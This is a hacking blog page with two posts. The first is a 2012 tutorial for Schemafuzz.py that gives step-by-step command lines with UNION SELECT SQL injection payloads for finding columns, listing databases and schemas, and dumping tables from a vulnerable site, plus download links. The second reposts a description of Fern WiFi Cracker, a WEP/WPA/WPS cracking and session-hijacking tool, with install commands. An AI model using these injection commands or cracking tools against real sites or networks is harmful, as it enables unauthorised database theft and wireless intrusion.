Recent Post

Flag Counter
Showing posts with label Backtrack. Show all posts
Showing posts with label Backtrack. Show all posts

Wednesday, November 14, 2012

[Tut] Run Schemafuzz.py Database Dump Tool

Now, Many tool hacking is easy to run Like Havij for database dump. But A person says that its tool for child 3 years old. Hahaha. Back to Schemafuzz, This tool quiet old named Schemafuzz that coded  by Darkc0de with phyton language. But Its still usefull to help to pentest website that buggy with SQL injection. Let's Download And See tutorial for command of Schemafuzz.py

Requirement :
1.Phyton  Download Here For windows

Here is preview 

Schemafuzz Priview

How it runs?

1.Finding range column 

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1" --findcol


2.Database name

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --dbs

 

3.Table and column name

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --schema -D databasename

4.Dump it

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --dump -D databasename -T tablename -C columnname,Columnname2


Here is Link to download Schemafuzz.py

Download Schemafuzz 

Mirror

 
Download Schemafuzz (From PasteBin)

Search Terms :
  • Download Schemafuzz.py



Monday, November 22, 2010

FERN WIFI CRACKER New Version (wep and wpa Cracker tool)

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks
Operating System Supported

The Software runs on any Linux mahine with the programs prerequisites, But the program has been tested on the following Linux based Operating Systems: 

  • Ubuntu KDE/GNOME
  • BackTrack Linux
  • BackBox Linux

Prerequisites
The Program requires the following to run properly:
The following dependencies can be installed using the Debian package installer command on debian based systems using "apt-get install program" or otherwise downloaded and installed manually
  • Aircrack-NG
  • Python-Scapy
  • Python Qt4
  • Python
  • Subversion
  • Xterm
  • Reaver (for WPS Attacks)
  • Macchanger
  • Features
Fern Wifi Cracker currently supports the following features:
  • WEP Cracking with Fragmentation,Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
  • WPA/WPA2 Cracking with Dictionary or WPS based attacks
  • Automatic saving of key in database on successful crack
  • Automatic Access Point Attack System
  • Session Hijacking (Passive and Ethernet Modes)
  • Access Point MAC Address Geo Location Tracking
  • Internal MITM Engine
  • Update Support
Installation
Installation on Debian Package supported systems:
root@host:~# dpkg -i Fern-Wifi-Cracker_1.6_all.deb
The Source Code for the program can be fetched using the following command on terminal
root@host:~# svn checkout http://fern-wifi-cracker.googlecode.com/svn/Fern-Wifi-Cracker/

This is Screenshot and description From the author

Fern wifi Cracker new release
Fern wifi Cracker

Fern wifi Cracker new release
Fern Wifi Cracker



Its Linux based, looks better on Gnome than KDE desktop interface, if
your using KDE the executable is in the directory /usr/local/bin/Fern-Wifi-Cracker , im giving this due to the fact that the debian installer was created for Gnome</
,so the shortcut will be created for gnome afer generic installation "dpkg -i Fern-Wifi-Cracker_1.0_all.deb" ,for KDE users, you may have to create a shortcut yourself
after the installation.
Just created the google code page for hosting it..... So please bear with the fact that i dont have a wiki help page yet

Download ( From Google Code )

DEVELOPER : Saviour Emmauel Ekiko

Source
http://www.backtrack-linux.org/forums/experts-forum/34517-new-fern-wifi-cracker.html
http://code.google.com/p/fern-wifi-cracker/

Search Terms:

  • Fern wifi cracker